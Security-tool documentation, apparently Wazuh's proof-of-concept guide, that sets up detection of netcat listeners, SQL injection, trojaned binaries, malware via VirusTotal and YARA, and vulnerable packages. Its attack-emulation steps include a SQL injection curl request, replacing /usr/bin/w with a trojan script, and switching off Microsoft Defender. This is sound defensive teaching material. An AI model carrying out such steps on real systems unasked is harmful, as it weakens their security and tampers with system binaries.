  1. Pull an image, such as the NGINX image, and run a container:

    $ sudo docker pull nginx
    $ sudo docker run -d -P --name nginx_container nginx
    $ sudo docker exec -it nginx_container cat /etc/passwd
    $ sudo docker exec -it nginx_container /bin/bash
    $ exit
    
  2. Stop and remove the container:

    $ sudo docker stop nginx_container
    $ sudo docker rm nginx_container
    
Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to Docker.

Troubleshooting
  • Error log:

    wazuh-modulesd:docker-listener: ERROR: /usr/bin/env: ‘python’: No such file or directory
    

    Location: Wazuh agent log - /var/ossec/logs/ossec.log

    Resolution: You can create a symbolic link to solve this:

    $ sudo ln -s /usr/bin/python3 /usr/bin/python
    

Monitoring AWS infrastructure

This use case shows how the Wazuh module for AWS (aws-s3) enables the log data collection from different AWS sources.

To learn more about monitoring AWS resources, see the Using Wazuh to monitor AWS section of the documentation.

Infrastructure

Cloud service

Description

Amazon CloudTrail

AWS Cloudtrail, like all other supported AWS services, requires setting the necessary policies for user permissions and providing a valid authentication method. In this PoC, we use the profile authentication method.

Configuration

Take the following steps to configure Wazuh to monitor Amazon CloudTrail services and identify security incidents.

CloudTrail
  1. Access the CloudTrail service using the AWS console.

  2. Create a new trail.

  3. Choose between creating a new S3 bucket or specifying an existing one to store CloudTrail logs. Note down the name of the S3 bucket used as it’s necessary to specify it in the Wazuh configuration.

The image below shows how to create a new CloudTrail service and attach a new S3 bucket.

Wazuh server
  1. Enable the Wazuh AWS module in the /var/ossec/etc/ossec.conf configuration file on the Wazuh server. Add only the AWS buckets of interest. Read our guide on how to Configure AWS credentials:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>30m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>no</skip_on_error>
    
      <bucket type="cloudtrail">
        <name><AWS_BUCKET_NAME></name>
        <aws_profile><AWS_PROFILE_NAME></aws_profile>
      </bucket>
    </wodle>
    
  2. Restart the Wazuh manager to apply the changes:

    $ sudo systemctl restart wazuh-manager
    
Test the configuration

Once you configure Cloudtrail, you can generate events by simply creating a new IAM user account using the IAM service. This generates an event that Wazuh processes.

The Wazuh default ruleset parses AWS logs and generates alerts automatically. The alerts appear as soon as Wazuh receives the logs from the AWS S3 bucket.

You can also find additional CloudTrail use cases in our documentation.

Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, navigate through Amazon Web Services module.

Detecting unauthorized processes

The Wazuh command monitoring capability runs commands on an endpoint and monitors the output of the commands.

In this use case, you use the Wazuh command monitoring capability to detect when Netcat is running on an Ubuntu endpoint. Netcat is a computer networking utility used for port scanning and port listening.

Infrastructure

Endpoint

Description

Ubuntu 22.04

You configure the Wazuh command monitoring module on this endpoint to detect a running Netcat process.

Configuration
Ubuntu endpoint

Take the following steps to configure command monitoring and query a list of all running processes on the Ubuntu endpoint.

  1. Add the following configuration block to the Wazuh agent /var/ossec/etc/ossec.conf file. This allows to periodically get a list of running processes:

    <ossec_config>
      <localfile>
        <log_format>full_command</log_format>
        <alias>process list</alias>
        <command>ps -e -o pid,uname,command</command>
        <frequency>30</frequency>
      </localfile>
    </ossec_config>
    
  2. Restart the Wazuh agent to apply the changes:

    $ sudo systemctl restart wazuh-agent
    
  3. Install Netcat and the required dependencies:

    $ sudo apt install ncat nmap -y
    
Wazuh server

You have to configure the following steps on the Wazuh server to create a rule that triggers every time the Netcat program launches.

  1. Add the following rules to the /var/ossec/etc/rules/local_rules.xml file on the Wazuh server:

    <group name="ossec,">
      <rule id="100050" level="0">
        <if_sid>530</if_sid>
        <match>^ossec: output: 'process list'</match>
        <description>List of running processes.</description>
        <group>process_monitor,</group>
      </rule>
    
      <rule id="100051" level="7" ignore="900">
        <if_sid>100050</if_sid>
        <match>nc -l</match>
        <description>netcat listening for incoming connections.</description>
        <group>process_monitor,</group>
      </rule>
    </group>
    
  2. Restart the Wazuh manager to apply the changes:

    $ sudo systemctl restart wazuh-manager
    
Attack emulation

On the monitored Ubuntu endpoint, run nc -l 8000 for 30 seconds.

Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • rule.id:(100051)

Network IDS integration

Wazuh integrates with a network-based intrusion detection system (NIDS) to enhance threat detection by monitoring and analyzing network traffic.

In this use case, we demonstrate how to integrate Suricata with Wazuh. Suricata can provide additional insights into your network's security with its network traffic inspection capabilities.

Infrastructure

Endpoint

Description

Ubuntu 22.04

This is the endpoint where you install Suricata. In this use case, Wazuh monitors and analyzes the network traffic generated on this endpoint.

Configuration

Take the following steps to configure Suricata on the Ubuntu endpoint and send the generated logs to the Wazuh server.

  1. Install Suricata on the Ubuntu endpoint. We tested this process with version 6.0.8 and it can take some time:

    $ sudo add-apt-repository ppa:oisf/suricata-stable
    $ sudo apt-get update
    $ sudo apt-get install suricata -y
    
  2. Download and extract the Emerging Threats Suricata ruleset:

    $ cd /tmp/ && curl -LO https://rules.emergingthreats.net/open/suricata-6.0.8/emerging.rules.tar.gz
    $ sudo tar -xvzf emerging.rules.tar.gz && sudo mkdir /etc/suricata/rules && sudo mv rules/*.rules /etc/suricata/rules/
    $ sudo chmod 777 /etc/suricata/rules/*.rules
    
  3. Modify Suricata settings in the /etc/suricata/suricata.yaml file and set the following variables:

    HOME_NET: "<UBUNTU_IP>"
    EXTERNAL_NET: "any"
    
    default-rule-path: /etc/suricata/rules
    rule-files:
    - "*.rules"
    
    # Global stats configuration
    stats:
    enabled: yes
    
    # Linux high speed capture support
    af-packet:
      - interface: enp0s3
    

    interface represents the network interface you want to monitor. Replace the value with the interface name of the Ubuntu endpoint. For example, enp0s3.

    # ifconfig
    
    enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255
            inet6 fe80::9ba2:9de3:57ad:64e5  prefixlen 64  scopeid 0x20<link>
            ether 08:00:27:14:65:bd  txqueuelen 1000  (Ethernet)
            RX packets 6704315  bytes 1268472541 (1.1 GiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 4590192  bytes 569730548 (543.3 MiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
  4. Restart the Suricata service:

    $ sudo systemctl restart suricata
    
  5. Add the following configuration to the /var/ossec/etc/ossec.conf file of the Wazuh agent. This allows the Wazuh agent to read the Suricata logs file:

    <ossec_config>
      <localfile>
        <log_format>json</log_format>
        <location>/var/log/suricata/eve.json</location>
      </localfile>
    </ossec_config>
    
  6. Restart the Wazuh agent to apply the changes:

    $ sudo systemctl restart wazuh-agent
    
Attack emulation

Wazuh automatically parses data from /var/log/suricata/eve.json and generates related alerts on the Wazuh dashboard.

Ping the Ubuntu endpoint IP address from the Wazuh server:

$ ping -c 20 "<UBUNTU_IP>"
Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • rule.groups:suricata

Troubleshooting
  • Error log:

    16/9/2022 -- 12:32:16 - <Notice> - all 2 packet processing threads, 4 management threads initialized, engine started.
    16/9/2022 -- 12:32:16 - <Error> - [ERRCODE: SC_ERR_AFP_CREATE(190)] - Unable to find iface eth0: No such device
    16/9/2022 -- 12:32:16 - <Error> - [ERRCODE: SC_ERR_AFP_CREATE(190)] - Couldn't init AF_PACKET socket, fatal error
    16/9/2022 -- 12:32:16 - <Error> - [ERRCODE: SC_ERR_FATAL(171)] - thread W#01-eth0 failed
    

    Location: Suricata log - /var/log/suricata/suricata.log

    Resolution: To solve this issue, check the name of your network interface and configure it accordingly in the /etc/sysconfig/suricata and /etc/suricata/suricata.yaml files.

Detecting an SQL injection attack

You can use Wazuh to detect SQL injection attacks from web server logs that contain patterns like select, union, and other common SQL injection patterns.

SQL injection is an attack in which a threat actor inserts malicious code into strings transmitted to a database server for parsing and execution. A successful SQL injection attack gives unauthorized access to confidential information contained in the database.

In this use case, you simulate an SQL injection attack against an Ubuntu endpoint and detect it with Wazuh.

Infrastructure

Endpoint

Description

Ubuntu 22.04

Victim endpoint running an Apache 2.4.54 web server.

RHEL 9.0

Attacker endpoint that launches the SQL injection attack.

Configuration
Ubuntu endpoint

Perform the following steps to install Apache and configure the Wazuh agent to monitor the Apache logs.

  1. Update the local packages and install the Apache web server:

    $ sudo apt update
    $ sudo apt install apache2
    
  2. If the firewall is enabled, modify it to allow external access to web ports. Skip this step if the firewall is disabled.

    $ sudo ufw app list
    $ sudo ufw allow 'Apache'
    $ sudo ufw status
    
  3. Check the status of the Apache service to verify that the web server is running:

    $ sudo systemctl status apache2
    
  4. Use the curl command or open http://<UBUNTU_IP> in a browser to view the Apache landing page and verify the installation:

    $ curl http://<UBUNTU_IP>
    
  5. Add the following lines to the Wazuh agent /var/ossec/etc/ossec.conf file. This allows the Wazuh agent to monitor the access logs of your Apache server:

    <ossec_config>
      <localfile>
        <log_format>apache</log_format>
        <location>/var/log/apache2/access.log</location>
      </localfile>
    </ossec_config>
    
  6. Restart the Wazuh agent to apply the configuration changes:

    $ sudo systemctl restart wazuh-agent
    
Attack emulation

Replace <UBUNTU_IP> with the appropriate IP address and execute the following command from the attacker endpoint:

$ curl -XGET "http://<UBUNTU_IP>/users/?id=SELECT+*+FROM+users";

The expected result here is an alert with rule ID 31103 but a successful SQL injection attempt generates an alert with rule ID 31106.

Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • rule.id:31103

  • rule.id:31106

Detecting suspicious binaries

Wazuh has anomaly and malware detection capabilities that detect suspicious binaries on an endpoint. Binaries are executable code written to perform automated tasks. Malicious actors use them mostly to carry out exploitation to avoid being detected.

In this use case, we demonstrate how the Wazuh rootcheck module can detect a trojan system binary on an Ubuntu endpoint. You perform the exploit by replacing the content of a legitimate binary with malicious code to trick the endpoint into running it as the legitimate binary.

The Wazuh rootcheck module also checks for hidden processes, ports, and files.

Infrastructure

Endpoint

Description

Ubuntu 22.04

The Wazuh rootcheck module detects the execution of a suspicious binary on this endpoint.

Configuration

Take the following steps on the Ubuntu endpoint to enable the Wazuh rootcheck module and perform anomaly and malware detection.

By default, the Wazuh rootcheck module is enabled in the Wazuh agent configuration file. Check the <rootcheck> block in the /var/ossec/etc/ossec.conf configuration file of the monitored endpoint and make sure that it has the configuration below:

<rootcheck>
    <disabled>no</disabled>

    <check_dev>yes</check_dev>
    <check_sys>yes</check_sys>
    <check_pids>yes</check_pids>
    <check_ports>yes</check_ports>
    <check_if>yes</check_if>

    <!-- Frequency that rootcheck is executed - every 12 hours -->
    <frequency>43200</frequency>
    <skip_nfs>yes</skip_nfs>
</rootcheck>

The rootcheck section explains the options in the rootcheck module.

Attack emulation
  1. Create a copy of the original system binary:

    $ sudo cp -p /usr/bin/w /usr/bin/w.copy
    
  2. Replace the original system binary /usr/bin/w with the following shell script:

    $ sudo tee /usr/bin/w << EOF
    #!/bin/bash
    echo "`date` this is evil" > /tmp/trojan_created_file
    echo 'test for /usr/bin/w trojaned file' >> /tmp/trojan_created_file
    #Now running original binary
    /usr/bin/w.copy
    EOF
    
  3. The rootcheck scan runs every 12 hours by default. Force a scan by restarting the Wazuh agent to see the relevant alert:

    $ sudo systemctl restart wazuh-agent
    
Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • location:rootcheck AND rule.id:510 AND data.title:Trojaned version of file detected.

  • Additionally, using the Filter by type search field, apply the full_log filter.

Detecting and removing malware using VirusTotal integration

Wazuh uses the integrator module to connect to external APIs and alerting tools such as VirusTotal.

In this use case, you use the Wazuh File Integrity Monitoring (FIM) module to monitor a directory for changes and the VirusTotal API to scan the files in the directory. Then, configure Wazuh to trigger an active response script and remove files that VirusTotal detects as malicious. We test this use case on Ubuntu and Windows endpoints.

You need a VirusTotal API key in this use case to authenticate Wazuh to the VirusTotal API.

For more information on this integration, check the VirusTotal integration section of the documentation.

Infrastructure

Endpoint

Description

Ubuntu 22.04

This is the Linux endpoint where you download a malicious file. Wazuh triggers an active response script to remove the file once VirusTotal flags it as malicious.

Windows 11

This is the Windows endpoint where you download a malicious file. Wazuh triggers an active response script to remove the file once VirusTotal flags it as malicious.

Configuration for the Ubuntu endpoint

Configure your environment as follows to test the use case for the Ubuntu endpoint. These steps work for other Linux distributions as well.

Ubuntu endpoint

Perform the following steps to configure Wazuh to monitor near real-time changes in the /root directory of the Ubuntu endpoint. These steps also install the necessary packages and create the active response script that removes malicious files.

  1. Search for the <syscheck> block in the Wazuh agent configuration file /var/ossec/etc/ossec.conf. Make sure that <disabled> is set to no. This enables the Wazuh FIM to monitor for directory changes.

  2. Add an entry within the <syscheck> block to configure a directory to be monitored in near real-time. In this case, you are monitoring the /root directory:

    <directories realtime="yes">/root</directories>
    
  3. Install jq, a utility that processes JSON input from the active response script.

    $ sudo apt update
    $ sudo apt -y install jq
    
  4. Create the /var/ossec/active-response/bin/remove-threat.sh active response script to remove malicious files from the endpoint:

    #!/bin/bash
    
    LOCAL=`dirname $0`;
    cd $LOCAL
    cd ../
    
    PWD=`pwd`
    
    read INPUT_JSON
    FILENAME=$(echo $INPUT_JSON | jq -r .parameters.alert.data.virustotal.source.file)
    COMMAND=$(echo $INPUT_JSON | jq -r .command)
    LOG_FILE="${PWD}/../logs/active-responses.log"
    
    #------------------------ Analyze command -------------------------#
    if [ ${COMMAND} = "add" ]
    then
     # Send control message to execd
     printf '{"version":1,"origin":{"name":"remove-threat","module":"active-response"},"command":"check_keys", "parameters":{"keys":[]}}\n'
    
     read RESPONSE
     COMMAND2=$(echo $RESPONSE | jq -r .command)
     if [ ${COMMAND2} != "continue" ]
     then
      echo "`date '+%Y/%m/%d %H:%M:%S'` $0: $INPUT_JSON Remove threat active response aborted" >> ${LOG_FILE}
      exit 0;
     fi
    fi
    
    # Removing file
    rm -f $FILENAME
    if [ $? -eq 0 ]; then
     echo "`date '+%Y/%m/%d %H:%M:%S'` $0: $INPUT_JSON Successfully removed threat" >> ${LOG_FILE}
    else
     echo "`date '+%Y/%m/%d %H:%M:%S'` $0: $INPUT_JSON Error removing threat" >> ${LOG_FILE}
    fi
    
    exit 0;
    
  5. Change the /var/ossec/active-response/bin/remove-threat.sh file ownership, and permissions:

    $ sudo chmod 750 /var/ossec/active-response/bin/remove-threat.sh
    $ sudo chown root:wazuh /var/ossec/active-response/bin/remove-threat.sh
    
  6. Restart the Wazuh agent to apply the changes:

    $ sudo systemctl restart wazuh-agent
    
Wazuh server

Perform the following steps on the Wazuh server to alert for changes in the endpoint directory and enable the VirusTotal integration. These steps also enable and trigger the active response script whenever a suspicious file is detected.

  1. Add the following rules to the /var/ossec/etc/rules/local_rules.xml file on the Wazuh server. These rules alert about changes in the /root directory that are detected by FIM scans:

    <group name="syscheck,pci_dss_11.5,nist_800_53_SI.7,">
        <!-- Rules for Linux systems -->
        <rule id="100200" level="7">
            <if_sid>550</if_sid>
            <field name="file">/root</field>
            <description>File modified in /root directory.</description>
        </rule>
        <rule id="100201" level="7">
            <if_sid>554</if_sid>
            <field name="file">/root</field>
            <description>File added to /root directory.</description>
        </rule>
    </group>
    
  2. Add the following configuration to the Wazuh server /var/ossec/etc/ossec.conf file to enable the Virustotal integration. Replace <YOUR_VIRUS_TOTAL_API_KEY> with your VirusTotal API key. This allows to trigger a VirusTotal query whenever any of the rules 100200 and 100201 are triggered:

    <ossec_config>
      <integration>
        <name>virustotal</name>
        <api_key><YOUR_VIRUS_TOTAL_API_KEY></api_key> <!-- Replace with your VirusTotal API key -->
        <rule_id>100200,100201</rule_id>
        <alert_format>json</alert_format>
      </integration>
    </ossec_config>
    

    Note

    The free VirusTotal API rate limits requests to four per minute. If you have a premium VirusTotal API key, with a high frequency of queries allowed, you can add more rules besides these two. You can also configure Wazuh to monitor more directories.

  3. Append the following blocks to the Wazuh server /var/ossec/etc/ossec.conf file. This enables Active Response and triggers the remove-threat.sh script when VirusTotal flags a file as malicious:

    <ossec_config>
      <command>
        <name>remove-threat</name>
        <executable>remove-threat.sh</executable>
        <timeout_allowed>no</timeout_allowed>
      </command>
    
      <active-response>
        <disabled>no</disabled>
        <command>remove-threat</command>
        <location>local</location>
        <rules_id>87105</rules_id>
      </active-response>
    </ossec_config>
    
  4. Add the following rules to the Wazuh server /var/ossec/etc/rules/local_rules.xml file to alert about the Active Response results:

    <group name="virustotal,">
      <rule id="100092" level="12">
        <if_sid>657</if_sid>
        <match>Successfully removed threat</match>
        <description>$(parameters.program) removed threat located at $(parameters.alert.data.virustotal.source.file)</description>
      </rule>
    
      <rule id="100093" level="12">
        <if_sid>657</if_sid>
        <match>Error removing threat</match>
        <description>Error removing threat located at $(parameters.alert.data.virustotal.source.file)</description>
      </rule>
    </group>
    
  5. Restart the Wazuh manager to apply the configuration changes:

    $ sudo systemctl restart wazuh-manager
    
Attack emulation
  1. Download an EICAR test file to the /root directory on the Ubuntu endpoint:

    $ sudo curl -Lo /root/eicar.com https://secure.eicar.org/eicar.com && sudo ls -lah /root/eicar.com
    
Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • Linux - rule.id: is one of 553,100092,87105,100201

    Remove malware on Linux alert
Configuration for the Windows endpoint
Windows endpoint

Perform the following steps to configure Wazuh to monitor near real-time changes in the /Downloads directory. These steps also install the necessary packages and create the active response script to remove malicious files.

  1. Search for the <syscheck> block in the Wazuh agent C:\Program Files (x86)\ossec-agent\ossec.conf file. Make sure that <disabled> is set to no. This enables the Wazuh FIM module to monitor for directory changes.

  2. Add an entry within the <syscheck> block to configure a directory to be monitored in near real-time. In this use case, you configure Wazuh to monitor the C:\Users\<USER_NAME>\Downloads directory. Replace the <USER_NAME> variable with the appropriate user name:

    <directories realtime="yes">C:\Users\<USER_NAME>\Downloads</directories>
    
  3. Download the Python executable installer from the official Python website.

  4. Run the Python installer once downloaded. Make sure to check the following boxes:

    • Install launcher for all users

    • Add Python 3.X to PATH (This places the interpreter in the execution path)

  5. Once Python completes the installation process, open an administrator PowerShell terminal and use pip to install PyInstaller:

    > pip install pyinstaller
    > pyinstaller --version
    

    You use Pyinstaller here to convert the active response Python script into an executable application that can run on a Windows endpoint.

  6. Create an active response script remove-threat.py to remove a file from the Windows endpoint:

    Warning

    This script is a proof of concept (PoC). Review and validate it to ensure it meets the operational and security requirements of your environment.

    # Copyright (C) 2015-2025, Wazuh Inc.
    # All rights reserved.
    
    import os
    import sys
    import json
    import datetime
    import stat
    import tempfile
    import pathlib
    
    if os.name == 'nt':
        LOG_FILE = "C:\\Program Files (x86)\\ossec-agent\\active-response\\active-responses.log"
    else:
        LOG_FILE = "/var/ossec/logs/active-responses.log"
    
    ADD_COMMAND = 0
    DELETE_COMMAND = 1
    CONTINUE_COMMAND = 2
    ABORT_COMMAND = 3
    
    OS_SUCCESS = 0
    OS_INVALID = -1
    
    class message:
        def __init__(self):
            self.alert = ""
            self.command = 0
    
    def write_debug_file(ar_name, msg):
        with open(LOG_FILE, mode="a") as log_file:
            log_file.write(str(datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')) + " " + ar_name + ": " + msg +"\n")
    
    def setup_and_check_message(argv):
        input_str = ""
        for line in sys.stdin:
            input_str = line
            break
    
        msg_obj = message()
        try:
            data = json.loads(input_str)
        except ValueError:
            write_debug_file(argv[0], 'Decoding JSON has failed, invalid input format')
            msg_obj.command = OS_INVALID
            return msg_obj
    
        msg_obj.alert = data
        command = data.get("command")
    
        if command == "add":
            msg_obj.command = ADD_COMMAND
        elif command == "delete":
            msg_obj.command = DELETE_COMMAND
        else:
            msg_obj.command = OS_INVALID
            write_debug_file(argv[0], 'Not valid command: ' + command)
    
        return msg_obj
    
    def send_keys_and_check_message(argv, keys):
        keys_msg = json.dumps({"version": 1,"origin":{"name": argv[0],"module":"active-response"},"command":"check_keys","parameters":{"keys":keys}})
        write_debug_file(argv[0], keys_msg)
    
        print(keys_msg)
        sys.stdout.flush()
    
        input_str = ""
        while True:
            line = sys.stdin.readline()
            if line:
                input_str = line
                break
    
        try:
            data = json.loads(input_str)
        except ValueError:
            write_debug_file(argv[0], 'Decoding JSON has failed, invalid input format')
            return OS_INVALID
    
        action = data.get("command")
        if action == "continue":
            return CONTINUE_COMMAND
        elif action == "abort":
            return ABORT_COMMAND
        else:
            write_debug_file(argv[0], "Invalid value of 'command'")
            return OS_INVALID
    
    def secure_delete_file(filepath_str, ar_name):
        filepath = pathlib.Path(filepath_str)
    
        # Reject NTFS alternate data streams
        if '::' in filepath_str:
            raise Exception(f"Refusing to delete ADS or NTFS stream: {filepath_str}")
    
        # Reject symbolic links and reparse points
        if os.path.islink(filepath):
            raise Exception(f"Refusing to delete symbolic link: {filepath}")
    
        attrs = os.lstat(filepath).st_file_attributes
        if attrs & stat.FILE_ATTRIBUTE_REPARSE_POINT:
            raise Exception(f"Refusing to delete reparse point: {filepath}")
    
        resolved_filepath = filepath.resolve()
    
        # Ensure it's a regular file
        if not resolved_filepath.is_file():
            raise Exception(f"Target is not a regular file: {resolved_filepath}")
    
      # Perform deletion
        os.remove(resolved_filepath)
    
    def main(argv):
        write_debug_file(argv[0], "Started")
        msg = setup_and_check_message(argv)
    
        if msg.command < 0:
            sys.exit(OS_INVALID)
    
        if msg.command == ADD_COMMAND:
            alert = msg.alert["parameters"]["alert"]
            keys = [alert["rule"]["id"]]
            action = send_keys_and_check_message(argv, keys)
    
            if action != CONTINUE_COMMAND:
                if action == ABORT_COMMAND:
                    write_debug_file(argv[0], "Aborted")
                    sys.exit(OS_SUCCESS)
                else:
                    write_debug_file(argv[0], "Invalid command")
                    sys.exit(OS_INVALID)
    
            try:
                file_path = alert["data"]["virustotal"]["source"]["file"]
                if os.path.exists(file_path):
                    secure_delete_file(file_path, argv[0])
                    write_debug_file(argv[0], json.dumps(msg.alert) + " Successfully removed threat")
                else:
                    write_debug_file(argv[0], f"File does not exist: {file_path}")
            except OSError as error:
                write_debug_file(argv[0], json.dumps(msg.alert) + "Error removing threat")
            except Exception as e:
                write_debug_file(argv[0], f"{json.dumps(msg.alert)}: Error removing threat: {str(e)}")
        else:
            write_debug_file(argv[0], "Invalid command")
    
        write_debug_file(argv[0], "Ended")
        sys.exit(OS_SUCCESS)
    
    if __name__ == "__main__":
        main(sys.argv)
    
  7. Convert the active response Python script remove-threat.py to a Windows executable application. Run the following PowerShell command as an administrator to create the executable:

    > pyinstaller -F \path_to_remove-threat.py
    

    Take note of the path where pyinstaller created remove-threat.exe.

  8. Move the executable file remove-threat.exe to the C:\Program Files (x86)\ossec-agent\active-response\bin directory.

  9. Restart the Wazuh agent to apply the changes. Run the following PowerShell command as an administrator:

    > Restart-Service -Name wazuh
    
Wazuh server

Perform the following steps on the Wazuh server to configure the VirusTotal integration. These steps also enable and trigger the active response script whenever a suspicious file is detected.

  1. Add the following configuration to the /var/ossec/etc/ossec.conf file on the Wazuh server to enable the VirusTotal integration. Replace <YOUR_VIRUS_TOTAL_API_KEY> with your VirusTotal API key. This allows to trigger a VirusTotal query whenever any of the rules in the FIM syscheck group are triggered:

    <ossec_config>
      <integration>
        <name>virustotal</name>
        <api_key><YOUR_VIRUS_TOTAL_API_KEY></api_key> <!-- Replace with your VirusTotal API key -->
        <group>syscheck</group>
        <alert_format>json</alert_format>
      </integration>
    </ossec_config>
    

    Note

    The free VirusTotal API rate limits requests to four per minute. If you have a premium VirusTotal API key, with a high frequency of queries allowed, you can add more rules besides these two. You can configure Wazuh to monitor more directories besides C:\Users\<USER_NAME>\Downloads.

  2. Append the following blocks to the Wazuh server /var/ossec/etc/ossec.conf file. This enables Active Response and trigger the remove-threat.exe executable when the VirusTotal query returns positive matches for threats:

    <ossec_config>
      <command>
        <name>remove-threat</name>
        <executable>remove-threat.exe</executable>
        <timeout_allowed>no</timeout_allowed>
      </command>
    
      <active-response>
        <disabled>no</disabled>
        <command>remove-threat</command>
        <location>local</location>
        <rules_id>87105</rules_id>
      </active-response>
    </ossec_config>
    
  3. Add the following rules to the Wazuh server /var/ossec/etc/rules/local_rules.xml file to alert about the Active Response results.

    <group name="virustotal,">
      <rule id="100092" level="12">
          <if_sid>657</if_sid>
          <match>Successfully removed threat</match>
          <description>$(parameters.program) removed threat located at $(parameters.alert.data.virustotal.source.file)</description>
      </rule>
    
      <rule id="100093" level="12">
        <if_sid>657</if_sid>
        <match>Error removing threat</match>
        <description>Error removing threat located at $(parameters.alert.data.virustotal.source.file)</description>
      </rule>
    </group>
    
  4. Restart the Wazuh manager to apply the configuration changes:

    $ sudo systemctl restart wazuh-manager
    
Attack emulation
  1. Follow the next steps to temporarily turn off real-time Microsoft Defender antivirus protection in Windows Security:

    1. Click on the Start menu and type Windows Security to search for that app.

    2. Select the Windows Security app from results, go to Virus & threat protection, and under Virus & threat protection settings select Manage settings.

    3. Switch Real-time protection to Off.

  2. Download an EICAR test file to the C:\Users\<USER_NAME>\Downloads directory on the Windows endpoint.

    > Invoke-WebRequest -Uri https://secure.eicar.org/eicar.com.txt -OutFile eicar.txt
    > cp .\eicar.txt C:\Users\<USER_NAME>\Downloads
    

    This triggers a VirusTotal query and generates an alert. In addition, the active response script automatically removes the file.

Visualize the alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and add the filters in the search bar to query the alerts.

  • Windows - rule.id: is one of 554,100092,553,87105

    Remove malware from Windows alert

Vulnerability detection

Wazuh uses the Vulnerability Detection module to identify vulnerabilities in applications and operating systems running on monitored endpoints.

This use case shows how Wazuh detects unpatched Common Vulnerabilities and Exposures (CVEs) in the monitored endpoint.

For more information on this capability, check the Vulnerability detection section of the Wazuh documentation.

Infrastructure

Endpoint

Description

Red Hat Enterprise Linux 7

The Wazuh Vulnerability Detection module scans this Linux endpoint for vulnerabilities in the operating system and installed applications.

Note

Vulnerabilities tagged with the description unimportant will not appear on the Wazuh dashboard. Visit the Wazuh CTI page for more information. The Compatibility matrix shows the operating systems officially supported by the Vulnerability Detection module.

Configuration

The Wazuh Vulnerability Detection module is enabled by default and it generates alerts when new vulnerabilities are detected or when existing vulnerabilities are resolved through package updates, removal, or system upgrades.

Wazuh Server

Perform the following steps on the Wazuh server to confirm that the Wazuh Vulnerability Detection module is enabled and properly configured.

  1. Open the Wazuh configuration /var/ossec/etc/ossec.conf and check the following settings.

    • Vulnerability detection is enabled:

      <vulnerability-detection>
         <enabled>yes</enabled>
         <index-status>yes</index-status>
         <feed-update-interval>60m</feed-update-interval>
      </vulnerability-detection>
      
    • The Wazuh indexer connection is properly configured.

      By default, the indexer settings have one host configured. It's set to 0.0.0.0 as highlighted below.

      <indexer>
        <enabled>yes</enabled>
        <hosts>
          <host>https://0.0.0.0:9200</host>
        </hosts>
        <ssl>
          <certificate_authorities>
            <ca>/etc/filebeat/certs/root-ca.pem</ca>
          </certificate_authorities>
          <certificate>/etc/filebeat/certs/filebeat.pem</certificate>
          <key>/etc/filebeat/certs/filebeat-key.pem</key>
        </ssl>
      </indexer>
      
      • Replace 0.0.0.0 with your Wazuh indexer node IP address or hostname. You can find this value in the Filebeat config file /etc/filebeat/filebeat.yml.

      • Ensure the Filebeat certificate and key name match the certificate files in /etc/filebeat/certs.

      If you are running a Wazuh indexer cluster infrastructure, add a <host> entry for each one of your nodes. For example, in a two-node configuration:

      <hosts>
        <host>https://10.0.0.1:9200</host>
        <host>https://10.0.0.2:9200</host>
      </hosts>
      

      The Wazuh server prioritizes reporting to the first Wazuh indexer node in the list. It switches to the next node in case it is not available.

  2. Restart the Wazuh manager if you made changes to the configuration:

    $ sudo systemctl restart wazuh-manager
    
Test the configuration

Note

The time it takes to detect vulnerabilities depends on the <interval> value in the Syscollector module, configured in the /var/ossec/etc/ossec.conf file on the Wazuh agent. For this test, we reduce the Syscollector module interval time from 1h to 10m. Refer to System inventory capability configuration for more information.

  1. Install Vim version 2:7.4.629-8 which is known to be vulnerable, on the RHEL 7 endpoint. Wait approximately 10 minutes (or the duration set in your Syscollector <interval>) for a new scan to run and the vulnerability to be detected.

  2. Remove the Vim package to fix the vulnerability. Wait 10 minutes for the syscollector to run a new scan to confirm the vulnerability has been cleared.

Visualize the vulnerabilities

You can visualize the detected vulnerabilities on the Wazuh dashboard. To see a list of active vulnerabilities, perform the following on the Wazuh dashboard:

  • Go to Vulnerability Detection and select Inventory.

  • Click + Add filter. Then filter by package.name.

  • In the Operator field, select is.

  • Search and select vim in the Values field.

To see vulnerability alerts from the last system inventory scan, switch to the Events tab. Add filters in the search bar to query vulnerability alerts for Vim.

Note

Not all vulnerabilities added to or removed from the inventory generate alerts. This depends on the event source. See Alert generation for more details.

Upon installation of the vulnerable Vim package, the active vulnerability alerts can be seen on the Wazuh dashboard by changing the filter to data.vulnerability.package.name: vim AND data.vulnerability.status:Active

After removing the vulnerable package from the endpoint, to view the resolved vulnerability alerts, simply change the filter values to data.vulnerability.package.name: vim AND data.vulnerability.status:Solved

Detecting malware using YARA integration

You can use the YARA integration with Wazuh to scan files added or modified on an endpoint for malware. YARA is a tool to detect and classify malware artifacts.

In this use case, we demonstrate how to configure YARA with Wazuh to detect malware on Linux and Windows endpoints.

To learn more about this integration with Wazuh, see the How to integrate Wazuh with YARA section of the documentation.

Infrastructure

Endpoint

Description

Ubuntu 22.04 / RHEL 9.0

The YARA Active Response module scans new or modified files whenever the Wazuh FIM module triggers an alert.

Windows 11

The YARA Active Response module scans new or modified files whenever the Wazuh FIM module triggers an alert.

Configuration for Linux
Linux endpoint

Perform the following steps to install YARA, and configure the Active Response and FIM modules.

  1. Download, compile and install YARA:

    Ubuntu

    $ sudo apt update
    $ sudo apt install -y make gcc autoconf libtool libssl-dev pkg-config jq
